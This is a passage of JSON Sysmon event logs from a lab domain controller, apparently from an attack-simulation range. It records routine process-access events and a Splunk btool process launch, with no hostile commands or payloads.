{41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3135,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3136,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3137,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3138,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3139,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-001041500500}\r\nTargetProcessId: 4516\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-001041500500}","TargetProcessId":"4516","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3140,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.304\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-0010FD500500}\r\nProcessId: 4544\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list httpServerListener: --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-001041500500}\r\nParentProcessId: 4516\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list httpServerListener: --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.304","ProcessGuid":"{41C8662E-1FF3-5F25-0000-0010FD500500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list httpServerListener: --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-001041500500}","ParentProcessId":"4516","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list httpServerListener: --no-log","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3141,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001041500500}\r\nSourceProcessId: 4516\r\nSourceThreadId: 4532\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010FD500500}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001041500500}","SourceProcessId":"4516","SourceThreadId":"4532","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010FD500500}","TargetProcessId":"4544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3142,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010FD500500}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010FD500500}","TargetProcessId":"4544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3143,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 